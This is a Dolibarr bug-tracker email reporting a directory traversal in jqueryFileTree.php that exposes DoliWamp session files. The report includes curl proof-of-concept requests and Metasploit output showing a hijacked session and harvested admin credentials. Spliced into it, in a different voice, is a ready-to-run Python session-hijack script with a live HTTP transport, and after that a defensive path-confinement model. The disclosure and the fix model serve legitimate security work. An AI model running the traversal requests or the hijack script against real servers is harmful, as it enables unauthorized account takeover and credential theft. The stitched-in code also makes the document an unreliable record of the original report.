[Dolibarr-bugtrack] [Bug #1212] 'jqueryFileTree.php' directory traversal


From: Doliforge
Subject: [Dolibarr-bugtrack] [Bug #1212] 'jqueryFileTree.php' directory traversal vulnerability
Date: Mon, 03 Feb 2014 15:40:16 +0100


'jqueryFileTree.php' directory traversal vulnerability

Latest modifications

2014-02-03 15:40 (Europe/Paris)
Changes:
  • Status: Open -> Closed

Snapshot

Details
Last Modified On: 2014-01-20 02:22
Submitted by: b (bcoles)
Submitted on: 2014-01-11 19:10
Summary: 'jqueryFileTree.php' directory traversal vulnerability
Description: The 'jqueryFileTree.php' file packaged with Dolibarr ERP versions 3.3.0 to 3.4.2 is vulnerable to directory traversal. This may allow session hijacking on DoliWamp on Windows.
Step to reproduce bug:

################################################################################
# Dolibarr ERP version 3.4.2 Directory Traversal #
################################################################################

Dolibarr ERP versions 3.3.0 to 3.4.2 are vulnerable to directory traversal.

The 'jqueryFileTree.php' file is vulnerable to directory traversal and allows
unauthenticated users to list directory contents outside the web document root.

The following proof of concept is available:
curl -i http://dolibarr.example.com/dolibarr/includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php --data "dir=../../../../../../../../"


################################################################################
# DoliWamp version 3.4.2 Session Token Disclosure #
################################################################################

DoliWamp - the Windows packaged installer distribution for Dolibarr ERP - allows
unauthenticated users to view session tokens.

For DoliWamp installations the open_basedir restriction (c:/dolibarr) prevents
the disclosure of directory listings for arbitrary directories outside of the
web document root (c:/dolibarr/htdocs/). However the DoliWamp packaged
installation stores and discloses session tokens in file names within the
base directory (c:/dolibarr/tmp/).

To demonstrate this issue, use directory traversal to list session files:
curl -i http://doliwamp.example.com/dolibarr/includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php --data "dir=../../../../../../../../tmp/"

Extract all session file names from the tmp directory, for example:
sess_ack40ajv2boaudh23mokrpd8o0

Use each token to create a session cookie, by requesting a URL which requires
authentication with the sess_xxx value as a cookie, for example:
curl -i http://doliwamp.example.com/dolibarr/user/fiche.php --cookie "DOLSESSID_anything=ack40ajv2boaudh23mokrpd8o0"

Extract the DOLSESSID cookie from the response, for example:
Set-Cookie: DOLSESSID_74aa8181333680a1ed08f6c33268e639=3so54hmr60nujl6lilf8mms1k1; path=/

If the initial session token is for a valid session then this cookie can be used
to authenticate without providing credentials.


A proof-of-concept Metasploit module is attached. Here's an example of the input:

msf> use auxiliary/gather/doliwamp_traversal_creds
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session - 1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session - 29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

Username  Password  Admin  E-mail
--------  --------  -----  ------
admin     admin     Yes

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Detected in version: 3.4.2
Category: Security
Severity: 5 - Major
OS Type/Version: Windows
PHP version:
Database type and version:

Status
Status: Closed
Assigned to: Laurent Destailleur (eldy)
Resolution: Fixed
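
The session-hijack procedure from the report above, as a stand-alone Python script. This is an added example: it is not the reporter's attached Metasploit module and not Dolibarr code. The URL paths, the `dir=` value and the `DOLSESSID_anything=<token>` cookie format come from the report; the `sess_<id>` file-name convention is PHP's file-based session handler. The listing markup, the "200 without a login form means the session was accepted" check and the offline stand-in host are assumptions, labelled in the code.

```python
"""Session hijack via the jqueryFileTree.php traversal, as described above.
Added example: not the reporter's Metasploit module and not Dolibarr code.
URL paths and the cookie format come from the report; the listing markup,
the 'no login form = authenticated' check and the offline host are assumed."""
import re
import urllib.error
import urllib.request
from typing import Callable, List, Optional, Tuple

TRAVERSAL_PATH = "/dolibarr/includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php"
AUTH_PATH = "/dolibarr/user/fiche.php"         # needs a login, per the report
SESSION_DIR = "../../../../../../../../tmp/"   # dir= value used in the report

# PHP's file-based session handler names each session file sess_<id>; only that
# prefix is relied on, so the regex does not depend on the connector's markup.
SESSION_FILE_RE = re.compile(r"sess_([0-9A-Za-z,-]{16,})")

# Transport: (path, POST body or None, Cookie header or None) ->
# (status, Set-Cookie values, body). Injected so the logic runs offline too.
Fetch = Callable[[str, Optional[bytes], Optional[str]], Tuple[int, List[str], str]]


def extract_session_ids(listing: str) -> List[str]:
    """Unique session ids named in a directory listing, in order of appearance."""
    ids: List[str] = []
    for sid in SESSION_FILE_RE.findall(listing):
        if sid not in ids:
            ids.append(sid)
    return ids


def session_cookie(sid: str) -> str:
    """Cookie replayed in the report; the DOLSESSID_ suffix is arbitrary."""
    return f"DOLSESSID_anything={sid}"


def issued_dolsessid(set_cookies: List[str]) -> Optional[str]:
    """The DOLSESSID_<hash>=<value> pair Dolibarr sends back, reusable as-is."""
    for header in set_cookies:
        m = re.match(r"(DOLSESSID_[0-9a-f]+)=([^;]+)", header)
        if m:
            return f"{m.group(1)}={m.group(2)}"
    return None


def looks_authenticated(status: int, body: str) -> bool:
    """Assumed check: 200 without Dolibarr's login form means the session was
    accepted. Verify the marker against the real login page before relying on it."""
    return status == 200 and 'name="username"' not in body


def hijack_sessions(fetch: Fetch) -> List[Tuple[str, Optional[str]]]:
    """List tmp/ through the traversal, replay every token against AUTH_PATH,
    return (token, cookie issued by the server) for each accepted session."""
    status, _, listing = fetch(TRAVERSAL_PATH, f"dir={SESSION_DIR}".encode(), None)
    if status != 200:
        return []
    hits: List[Tuple[str, Optional[str]]] = []
    for sid in extract_session_ids(listing):
        st, set_cookies, body = fetch(AUTH_PATH, None, session_cookie(sid))
        if looks_authenticated(st, body):
            hits.append((sid, issued_dolsessid(set_cookies)))
    return hits


def http_fetch(base_url: str) -> Fetch:
    """Real transport over urllib, for a host you are authorised to test."""
    def fetch(path, data, cookie):
        req = urllib.request.Request(base_url + path, data=data)
        if cookie:
            req.add_header("Cookie", cookie)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.headers.get_all("Set-Cookie") or [], resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.headers.get_all("Set-Cookie") or [], err.read().decode("utf-8", "replace")
    return fetch


# Constructed stand-in for a DoliWamp host (not captured traffic). The listing
# follows the jqueryFileTree connector's <li class="file"><a rel=...> shape.
FAKE_LISTING = """<ul class="jqueryFileTree" style="display: none;">
<li class="file ext_"><a href="#" rel="../../../../../../../../tmp/sess_ack40ajv2boaudh23mokrpd8o0">sess_ack40ajv2boaudh23mokrpd8o0</a></li>
<li class="file ext_"><a href="#" rel="../../../../../../../../tmp/sess_b7q2m0c1d9e8f7g6h5i4j3k2l1">sess_b7q2m0c1d9e8f7g6h5i4j3k2l1</a></li>
</ul>"""
LIVE_TOKENS = {"ack40ajv2boaudh23mokrpd8o0"}   # only this one belongs to a logged-in user
LOGIN_FORM = '<form><input type="text" name="username"><input type="password" name="password"></form>'


def fake_fetch(path, data, cookie):
    if path == TRAVERSAL_PATH:
        return 200, [], FAKE_LISTING
    sid = cookie.split("=", 1)[1] if cookie else ""
    if sid in LIVE_TOKENS:   # server accepts the id and issues its own DOLSESSID_<hash> cookie
        return 200, ["DOLSESSID_74aa8181333680a1ed08f6c33268e639=3so54hmr60nujl6lilf8mms1k1; path=/"], "<html>Logged in</html>"
    return 200, [], LOGIN_FORM


if __name__ == "__main__":
    for sid, cookie in hijack_sessions(fake_fetch):
        print(f"hijacked session {sid}; reuse cookie: {cookie}")
```

`hijack_sessions(http_fetch("http://doliwamp.example.com"))` runs the same logic against a host you are authorised to test; `fake_fetch` exercises it offline. The report's progress output shows why every token in tmp/ has to be tried: a session file on disk does not imply a live, logged-in session, so most replays come back as the login page.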

Comments

Laurent Destailleur 2014-01-20 02:22
The bug has been corrected inside GIT sources
(http://www.github.com/Dolibarr/dolibarr).

So fix should be available with next stable release.
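
Why open_basedir did not contain this on DoliWamp, and what a connector-side check has to look like, modelled in Python as an added example. It is not the commit in the Dolibarr git repository that the comment above refers to (that fix is PHP). The layout is assumed from the report: install root c:/dolibarr (the open_basedir value), document root c:/dolibarr/htdocs, and the connector executing from its own directory under htdocs/includes/. Windows path semantics are reproduced with the `ntpath` module so the script behaves identically on any OS; the number of `../` needed depends on where the connector actually lives, and six levels reach c:/dolibarr from the directory assumed here.

```python
"""Path confinement for a jqueryFileTree-style connector, modelled in Python.
Added example, not the Dolibarr commit; the layout is assumed from the report
(install root c:/dolibarr, docroot c:/dolibarr/htdocs). ntpath gives Windows
path semantics on any OS, so the DoliWamp case can be reproduced anywhere."""
import ntpath
from typing import Optional

INSTALL_ROOT = "c:/dolibarr"          # open_basedir on DoliWamp (from the report)
DOCROOT = INSTALL_ROOT + "/htdocs"    # web document root (from the report)
# Directory the connector executes in; assumed from the URL in the report.
CONNECTOR_DIR = DOCROOT + "/includes/jquery/plugins/jqueryFileTree/connectors"


def unchecked_target(requested: str) -> str:
    """What a connector that does scandir($root . $_POST['dir']) ends up opening:
    the request is joined to the working directory with no validation at all."""
    return ntpath.normpath(ntpath.join(CONNECTOR_DIR, requested))


def resolve_within(base: str, requested: str) -> Optional[str]:
    """Canonicalise the requested directory and return it only if it lies under
    base. With base = CONNECTOR_DIR this is the fix; with base = INSTALL_ROOT it
    models what open_basedir enforces, which is the weaker boundary."""
    base = ntpath.normpath(base)
    target = unchecked_target(requested)
    try:
        inside = ntpath.commonpath([base, target]) == base
    except ValueError:        # different drive, or absolute vs relative: never inside
        inside = False
    return target if inside else None


def open_basedir_allows(requested: str) -> bool:
    """Would DoliWamp's open_basedir=c:/dolibarr let the listing happen?"""
    return resolve_within(INSTALL_ROOT, requested) is not None


def hardened_connector_allows(requested: str) -> bool:
    """Would a connector confined to its own directory let the listing happen?"""
    return resolve_within(CONNECTOR_DIR, requested) is not None


if __name__ == "__main__":
    # Six '..' reach c:/dolibarr from CONNECTOR_DIR; seven reach the drive root.
    for req in ("../../../../../../tmp/", "../../../../../../../Windows/", "c:/Windows/", "sub/"):
        print(f"{req:32} -> {unchecked_target(req):48} "
              f"open_basedir={open_basedir_allows(req)!s:5} hardened={hardened_connector_allows(req)}")
```

The tmp/ case is the one the report exploits: it resolves to c:\dolibarr\tmp, which is inside the open_basedir boundary and so is listed, while the same request is rejected once the connector checks against its own directory. Paths that climb to the drive root, name a drive letter outright, or point at another drive fail both checks, which matches the report's observation that arbitrary directories outside c:/dolibarr were not listable on DoliWamp.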

